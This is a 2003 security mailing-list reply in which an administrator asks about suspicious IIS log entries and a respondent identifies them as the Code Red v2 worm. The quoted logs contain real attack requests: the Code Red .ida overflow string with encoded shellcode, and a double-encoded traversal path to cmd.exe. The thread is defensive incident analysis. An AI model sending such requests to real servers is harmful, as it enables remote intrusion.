Security Basics mailing list archives

RE: Suspicious IIS Log entry

From: Joey Peloquin <jpelo1 () jcpenney com>
Date: Tue, 09 Sep 2003 16:48:31 -0500

That's the ancient Code Red v2 worm.  Exploiting ISAPI extension for
Index Server (ida).

 - jp

-----Original Message-----
From: Toby Schau [mailto:Toby.Schau () iacudiv state ia us] 
Sent: Tuesday, September 09, 2003 11:43 AM
To: 'Security-Basics () Securityfocus com'
Subject: Suspicious IIS Log entry

I found the following suspicious entries in my IIS log files. Does
anyone recognize the specific vulnerabilities that are attempted to be
exploited? 
[ex030809.log (20)] : 2003-08-09 05:14:10 xxx.xx.xx.xx- xx.xx.xx.xx 80
GET /default.ida
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
%u90
90%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u90
90%u
9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 404 - 

[ex030908.log (201)] : 2003-09-08 06:31:02 xx.xxxxx.xxx - xxx.xx.xxx.xx
80 GET /<Rejected-By-UrlScan>
~/scripts/..%255c%255c../winnt/system32/cmd.exe
404 - 
Thanks

------------------------------------------------------------------------
---
Captus Networks 
Are you prepared for the next Sobig & Blaster? 
 - Instantly Stop DoS/DDoS Attacks, Worms & Port Scans 
 - Precisely Define and Implement Network Security 
 - Automatically Control P2P, IM and Spam Traffic 
FIND OUT NOW -  FREE Vulnerability Assessment Toolkit 
http://www.captusnetworks.com/ads/42.htm
------------------------------------------------------------------------
----

The information transmitted is intended only for the person or entity to
which it is addressed and may contain confidential and/or privileged
material.  If the reader of this message is not the intended recipient,
you are hereby notified that your access is unauthorized, and any review,
dissemination, distribution or copying of this message including any
attachments is strictly prohibited.   If you are not the intended
recipient, please contact the sender and delete the material from any
computer.

---------------------------------------------------------------------------
Captus Networks 
Are you prepared for the next Sobig & Blaster? 
 - Instantly Stop DoS/DDoS Attacks, Worms & Port Scans 
 - Precisely Define and Implement Network Security 
 - Automatically Control P2P, IM and Spam Traffic 
FIND OUT NOW -  FREE Vulnerability Assessment Toolkit 
http://www.captusnetworks.com/ads/42.htm
----------------------------------------------------------------------------

Current thread:

Suspicious IIS Log entry Toby Schau (Sep 09)
- RE: Suspicious IIS Log entry Michael Moeller (Sep 09)
- Re: Suspicious IIS Log entry Tomasz Onyszko (Sep 09)
- Re: Suspicious IIS Log entry Flhex (Sep 09)
- RE: Suspicious IIS Log entry Paul Kurczaba (Sep 09)
- Re: Suspicious IIS Log entry Sean Earp (Sep 09)
- RE: Suspicious IIS Log entry Joey Peloquin (Sep 09)
  - RE: Suspicious IIS Log entry Byron Copeland (Sep 10)
- Re: Suspicious IIS Log entry Tomas Wolf (Sep 10)